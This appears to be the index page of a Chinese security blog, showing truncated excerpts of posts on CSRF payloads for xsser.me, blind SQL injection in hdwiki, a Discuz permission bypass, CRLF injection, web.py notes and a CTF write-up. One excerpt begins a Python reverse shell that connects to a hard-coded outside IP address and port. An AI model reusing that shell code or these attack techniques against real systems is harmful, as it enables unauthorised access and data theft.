前几天写了那个CSRF防御模块，官网回应较少，看来那里鲜有人把安全放在眼中。。今天干脆封装一个CSRF的模块，加入xsser.me这个平台里，方便以后的渗透。如果你的目标或目标的旁站...

    hdwiki某处对referer未做过滤，造成sql注入     但因为没有输出点，只能做盲注。     基于时间的盲注脚本已写好，测试可注入...

    实话说，以后不想再挖web漏洞了，也不想发这类文章，web的东西搞来搞起就是那个样，我原本就不想深入，想那些大神一样能把一个cms分析得透彻。我有时候只是泛泛地看，泛泛地找一...

    最近关注的一个discuz平衡权限漏洞，可以绕过附件下载权限达到免费下载附件的目的。于是，自己用C#开发了一个小程序，给大家编译好的exe文件供参考。     0x01 原理...

    python在linux下的反弹shell代码我相信很多人都见过： import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...

    最近在做python的web开发（原谅我的多变，好东西总想都学着。。。node.js也是），不过过程中总遇到些问题，不管是web.py还是django，开发起来确实没用php方便，毕竟存在的时间比...

    整理一下这些天研究web.py的一些经验，写一篇具有划时代意义的指南性说明~哈哈，开个玩笑，谨以此文献给所有学习web.py的同学以及Aaron Swart.     web.py是一个开...

CRLF Injection很少遇见，这次被我逮住了。我看zone中（http://zone.wooyun.org/content/13323）还有一些同学对于这个漏洞不甚了解，甚至分不清它与CSRF，我详细说一下吧。 CRLF是”回车 + ...

    实话说我标题党了，这只是一个小tip，不能算漏洞（因为我想swart就是这样设计的）。不过文档中似乎没有把这个说出来，我想如果有一千万分之一的概率被程序员这样写了，...

首先我代表我们XDCTF主办方对大家说声辛苦了，十一假期本该休息却依旧奋斗在CTF第一线。我是XDCTF2014的出题人之一，也是服务器的维护者之一，关于比赛不想说太多，有太多不可控制的因素。包括...